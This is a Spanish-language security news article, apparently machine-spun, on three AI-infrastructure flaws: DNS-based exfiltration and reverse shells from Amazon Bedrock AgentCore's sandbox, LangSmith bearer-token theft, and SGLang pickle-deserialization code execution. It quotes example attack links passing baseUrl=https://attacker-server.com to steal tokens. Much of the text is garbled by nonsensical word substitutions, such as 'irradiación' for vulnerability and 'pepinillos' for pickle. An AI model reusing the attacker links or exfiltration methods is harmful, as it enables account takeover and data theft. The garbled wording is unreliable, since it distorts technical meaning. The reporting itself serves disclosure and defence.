Investigadores de ciberseguridad han revelado detalles de un nuevo método para extraer datos confidenciales de entornos de ejecución de código de inteligencia fabricado (IA) mediante consultas al sistema de nombres de dominio (DNS).
En un documentación publicado el lunes, BeyondTrust reveló que el modo sandbox de Amazon Bedrock AgentCore Code Interpreter permite consultas DNS salientes que un atacante puede explotar para habilitar shells interactivos y evitar el aislamiento de la red. La irradiación, que no tiene un identificador CVE, tiene una puntuación CVSS de 7,5 sobre 10,0.
Amazon Bedrock AgentCore Code Interpreter es un servicio totalmente administrado que permite a los agentes de IA ejecutar código de forma segura en entornos sandbox aislados, de modo que las cargas de trabajo de agentes no puedan conseguir a sistemas externos. Fue emprendedor por Amazon en agosto de 2025.
El hecho de que el servicio permita consultas de DNS a pesar de la configuración de “sin paso a la red” puede permitir que “los actores de amenazas establezcan canales de comando y control y exfiltración de datos a través de DNS en ciertos escenarios, evitando los controles de aislamiento de red esperados”, dijo Kinnaird McQuade, arquitecto cabecilla de seguridad de BeyondTrust.
En un ambiente de ataque real, un actor de amenazas puede forzar de este comportamiento para configurar un canal de comunicación bidireccional mediante consultas y respuestas de DNS, obtener un shell inverso interactivo, filtrar información confidencial a través de consultas de DNS si su función de IAM tiene permisos para conseguir a capital de AWS, como depósitos S3 que almacenan esos datos, y ejecutar comandos.
Es más, se puede forzar del mecanismo de comunicación DNS para entregar cargas bártulos adicionales que se envían al intérprete de código, lo que hace que sondee el servidor de comando y control (C2) de DNS en sondeo de comandos almacenados en registros DNS A, los ejecute y devuelva los resultados a través de consultas de subdominio DNS.
Vale la pena señalar que Code Interpreter requiere una función de IAM para conseguir a los capital de AWS. Sin bloqueo, un simple descuido puede provocar que se asigne una función con privilegios excesivos al servicio, otorgándole amplios permisos para conseguir a datos confidenciales.
“Esta investigación demuestra cómo la resolución DNS puede socavar las garantías de aislamiento de la red de los intérpretes de código aislados”, dijo BeyondTrust. “Al utilizar este método, los atacantes podrían poseer extraído datos confidenciales de los capital de AWS accesibles a través de la función IAM del intérprete de código, lo que podría causar tiempo de inactividad, violaciones de datos de información confidencial del cliente o infraestructura eliminada”.
Tras una divulgación responsable en septiembre de 2025, Amazon determinó que se trataba de una funcionalidad prevista y no de un defecto, e instó a los clientes a utilizar el modo VPC en puesto del modo sandbox para un aislamiento completo de la red. El coloso tecnológico asimismo recomienda el uso de un firewall DNS para filtrar el tráfico DNS saliente.
“Para proteger las cargas de trabajo sensibles, los administradores deben inventariar todas las instancias activas de AgentCore Code Interpreter y portar inmediatamente aquellas que manejan datos críticos del modo Sandbox al modo VPC”, dijo Jason Soroko, miembro senior de Sectigo.
“Ejecutar en el interior de una VPC proporciona la infraestructura necesaria para un aislamiento sólido de la red, lo que permite a los equipos implementar grupos de seguridad estrictos, ACL de red y firewalls DNS Route53 Resolver para monitorear y encerrar la resolución DNS no autorizada. Finalmente, los equipos de seguridad deben auditar rigurosamente las funciones de IAM adjuntas a estos intérpretes, aplicando estrictamente el principio de privilegio intrascendente para restringir el radiodifusión de golpe de cualquier posible compromiso”.
LangSmith es susceptible a un error de adquisición de cuentas
La divulgación se produce cuando Miggo Security reveló una rotura de seguridad de inscripción pesadez en LangSmith (CVE-2026-25750, puntuación CVSS: 8,5) que exponía a los usuarios a un posible robo de tokens y apropiación de cuentas. El problema, que afecta tanto a las implementaciones autohospedadas como a las implementaciones en la montón, se solucionó en la lectura 0.12.71 de LangSmith lanzazo en diciembre de 2025.
La deficiencia se ha caracterizado como un caso de inyección de parámetros de URL derivada de una desliz de potencia en el parámetro baseUrl, lo que permite a un atacante robar el token de portador, la ID de heredero y la ID del espacio de trabajo de un heredero que ha iniciado sesión y transmitidos a un servidor bajo su control mediante técnicas de ingeniería social, como engañar a la víctima para que haga clic en un enlace especialmente diseñado como el futuro:
- Cirro: smith.langchain(.)com/studio/?baseUrl=https://attacker-server.com
- Autohospedado –
/studio/?baseUrl=https://attacker-server.com
La explotación exitosa de la vulnerabilidad podría permitir a un atacante obtener paso no facultado al historial de seguimiento de la IA, así como exponer consultas SQL internas, registros de clientes de CRM o código fuente propietario mediante la revisión de llamadas a herramientas.
“Un heredero de LangSmith que haya iniciado sesión podría estar comprometido simplemente accediendo a un sitio controlado por un atacante o haciendo clic en un enlace receloso”, dijeron los investigadores de Miggo, Liad Eliyahu y Eliana Vuijsje.
“Esta vulnerabilidad es un recordatorio de que las plataformas de observabilidad de IA son ahora una infraestructura crítica. Como estas herramientas priorizan la flexibilidad de los desarrolladores, a menudo pasan por parada sin darse cuenta las barreras de seguridad. Este peligro se agrava porque, al igual que el software ‘tradicional’, los agentes de IA tienen paso profundo a fuentes de datos internas y servicios de terceros”.
Defectos de deserialización de pepinillos inseguros en SGLang
Todavía se han señalado vulnerabilidades de seguridad en SGLang, un popular ámbito de código amplio para servir modelos de verbo grandes y modelos de IA multimodal, que, si se explotan con éxito, podrían desencadenar una deserialización insegura de pickle, lo que podría resultar en la ejecución remota de código.
Las vulnerabilidades, descubiertas por el investigador de seguridad de Orca, Igor Stepansky, siguen sin parchearse al momento de escribir este artículo. Una breve descripción de las fallas es la futuro:
- CVE-2026-3059 (Puntuación CVSS: 9,8): una vulnerabilidad de ejecución remota de código no autenticado a través del broker ZeroMQ (asimismo conocido como ZMQ), que deserializa datos que no son de confianza utilizando pickle.loads() sin autenticación. Afecta al módulo de gestación multimodal de SGLang.
- CVE-2026-3060 (Puntuación CVSS: 9,8): una vulnerabilidad de ejecución remota de código no autenticado a través del módulo de desagregación, que deserializa datos que no son de confianza utilizando pickle.loads() sin autenticación. Afecta al sistema de desagregación paralela del codificador SGLang.
- CVE-2026-3989 (Puntuación CVSS: 7,8): el uso de una función pickle.load() insegura sin potencia y deserialización adecuada en “replay_request_dump.py” de SGLang, que puede explotarse proporcionando un archivo pickle receloso.
“Los dos primeros permiten la ejecución remota de código no autenticado contra cualquier implementación de SGLang que exponga sus características de gestación o desagregación multimodal a la red”, dijo Stepansky. “El tercero implica una deserialización insegura en una utilidad de reproducción de volcado de memoria”.
En un aviso coordinado, el Centro de Coordinación CERT (CERT/CC) dijo que SGLang es pusilánime a CVE-2026-3059 cuando el sistema de gestación multimodal está competente, y a CVE-2026-3060 cuando el sistema de desagregación paralela del codificador está competente.
“Si se cumple cualquiera de las condiciones y un atacante conoce el puerto TCP en el que el corredor ZMQ está escuchando y puede despachar solicitudes al servidor, puede explotar la vulnerabilidad enviando un archivo pickle receloso al corredor, que luego lo deserializará”, dijo CERT/CC.
Se recomienda a los usuarios de SGLang restringir el paso a las interfaces del servicio y cerciorarse de que no estén expuestos a redes que no sean de confianza. Todavía se recomienda implementar controles de paso y segmentación de red adecuados para evitar la interacción no autorizada con los puntos finales de ZeroMQ.
Si aceptablemente no hay evidencia de que estas vulnerabilidades hayan sido explotadas en la naturaleza, es crucial monitorear conexiones TCP entrantes inesperadas al puerto del corredor ZeroMQ, procesos secundarios inesperados generados por el proceso SGLang Python, creación de archivos en ubicaciones inusuales por el proceso SGLang y conexiones salientes del proceso SGLang a destinos inesperados.
